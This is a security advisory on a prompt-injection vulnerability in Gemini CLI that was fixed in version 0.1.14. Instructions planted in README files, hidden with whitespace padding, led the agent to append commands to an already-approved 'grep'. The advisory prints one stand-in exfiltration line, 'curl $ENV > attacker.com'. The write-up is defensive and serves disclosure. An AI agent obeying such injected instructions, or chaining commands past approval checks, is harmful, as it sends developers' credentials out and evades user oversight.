Gemini CLI Vulnerability Enables Silent Execution of Malicious Commands on Developer Systems
Summary
Security Advisory :
In July 2025, a critical security vulnerability was discovered in Google’s Gemini CLI, a command-line tool used by developers to interact with Gemini AI. The flaw allowed attackers to execute hidden, malicious commands without user consent by exploiting prompt injection, poor command validation and an ambiguous trust interface.
This issue was responsibly reported and addressed with the release of Gemini CLI version 0.1.14. The incident highlights the growing need for secure integration of AI tools in software development workflows.
Vulnerability Details
Security researchers identified that Gemini CLI reads project context files—such as README.md—to understand the codebase. Attackers can embed malicious commands into these files using indirect prompt injection techniques. These injected payloads are often disguised within legitimate content (e.g. license text, markdown formatting) to avoid detection.
A core issue lies in Gemini’s handling of command approvals. Gemini CLI remembers previously approved commands (e.g. grep) to avoid prompting the user repeatedly. Attackers exploited this by appending malicious commands (e.g. curl $ENV > attacker.com) to a trusted one. Since the first part is familiar, the entire command string is executed without further validation.
To increase stealth, malicious commands are hidden using whitespace padding or formatting tricks to avoid visual detection in the terminal or logs. Researchers demonstrated this attack by cloning a poisoned public GitHub repository, which resulted in unauthorized exfiltration of credentials during Gemini CLI analysis.Initially labeled as a low-severity issue, Google elevated its classification to a high-priority vulnerability and released a fix in version 0.1.14, which now enforces stricter visibility and re-approval of commands.
Note: By default, Gemini CLI does not enable sandboxing, so manual configuration is required to isolate execution environments from the host system.
Attack Flow
| Step | Description |
| 1. Craft | Malicious prompt injections are embedded inside context files like README.md along with benign code. |
| 2. Deliver | Malicious repository is cloned or reviewed by a developer using Gemini CLI. |
| 3. Trigger | Gemini CLI loads and interprets the context files. |
| 4. Execution | Malicious code is executed due to weak validation and implicit trust. |
| 5. Exfiltrate | Environment variables or secrets are silently sent to attacker-controlled servers. |
Proof-of-Concept Snippet
Source: Tracebit
Why It’s Effective
- Indirect Prompt Injection: Inserts malicious instructions within legitimate files rather than in direct input, bypassing typical user scrutiny.
- Command Whitelist Bypass: Weak command validation allows malicious extensions of approved commands.
- Visual Stealth: Large whitespace and terminal output manipulation hide malicious commands from users & security Tools.
Broader Implications
Gemini CLI are powerful for developers, helping to automate tasks and understand code faster. But this also comes with vulnerabilities especially when these tools can run commands and interact with untrusted code. This recent example shows how important it is to stay secure when using AI assistants to analyze unknown repositories. For teams working with open-source projects or unfamiliar codebases, it’s important to have safety checks in place. This highlights the growing need for smarter, more secure AI-driven tools that support developers without putting systems at risk.
Remediation:
- Upgrade Gemini CLI to version 0.1.14 or later.
- Enable sandboxing modes where it is possible to isolate and protect systems.
- Avoid running Gemini CLI against untrusted or unknown codebases without appropriate safeguards.
- Review and monitor command execution prompts carefully
Conclusion:
The Gemini CLI vulnerability underscores how prompt injection and command trust mechanisms can silently expose systems to attack when using AI tools. As these assistants become more deeply integrated into development workflows, it’s vital to adopt a “trust, but verify” approach treating AI-generated or assisted actions with the same caution as externally sourced code.
Security, visibility and isolation should be core pillars in any team’s approach to adopting AI in DevOps and engineering pipelines.
References:



